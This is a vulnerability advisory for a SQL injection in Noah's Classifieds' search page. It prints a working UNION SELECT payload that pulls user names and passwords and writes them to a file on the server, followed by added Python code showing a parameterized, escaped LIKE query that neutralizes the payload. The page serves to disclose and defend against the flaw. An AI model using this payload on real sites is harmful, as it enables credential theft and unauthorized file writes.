Noah's Classifieds Search Page SQL Injection Vulnerability
No exploit is required. An example has been provided: an attacker sends a 'POST' request to the affected search page and supplies the following in the search field:

kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#
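The string above works only if the search term is pasted into the SQL text, where its quote and three closing parentheses can end the LIKE clause. The following is an added example, not code from the application or the advisory: a search that passes the term as a bound parameter. It assumes SQLite as a stand-in database, a hypothetical `ads` table and hypothetical function names; only `classifieds_classifiedsuser`, `name` and `password` come from the page, and the nesting of the WHERE clause is inferred from the `)))` in the string.

```python
import sqlite3


def escape_like(term: str) -> str:
    """Escape LIKE metacharacters so user input only matches as literal text."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_ads(conn: sqlite3.Connection, term: str):
    # The term is bound as a parameter: quotes, parentheses and comment markers
    # inside it are data and can never terminate the LIKE string or the clause.
    sql = ("SELECT id, title FROM ads "
           "WHERE (((title LIKE ? ESCAPE '\\') OR (body LIKE ? ESCAPE '\\')))")
    pattern = f"%{escape_like(term)}%"
    return conn.execute(sql, (pattern, pattern)).fetchall()


def build_demo_db() -> sqlite3.Connection:
    """Constructed sample data; the `ads` table and its columns are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE ads (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE classifieds_classifiedsuser (name TEXT, password TEXT);
        INSERT INTO ads (title, body) VALUES
            ('Red bicycle', 'Barely used'),
            ('50% off sofa', 'Moving sale');
        INSERT INTO classifieds_classifiedsuser VALUES ('admin', 'constructed-hash');
    """)
    return conn


# Constructed, shortened form of the search-field value quoted on the page.
SHORTENED_PAGE_INPUT = ("kapda%')))/**/UNION/**/SELECT/**/name,password"
                        "/**/FROM/**/classifieds_classifiedsuser#")

if __name__ == "__main__":
    db = build_demo_db()
    print(search_ads(db, "bicycle"))             # ordinary search
    print(search_ads(db, SHORTENED_PAGE_INPUT))  # treated as literal text
    print(search_ads(db, "%"))                   # literal percent sign only
```

With binding in place the database only looks for ads whose text contains the whole string, so no row from the user table can reach the result set.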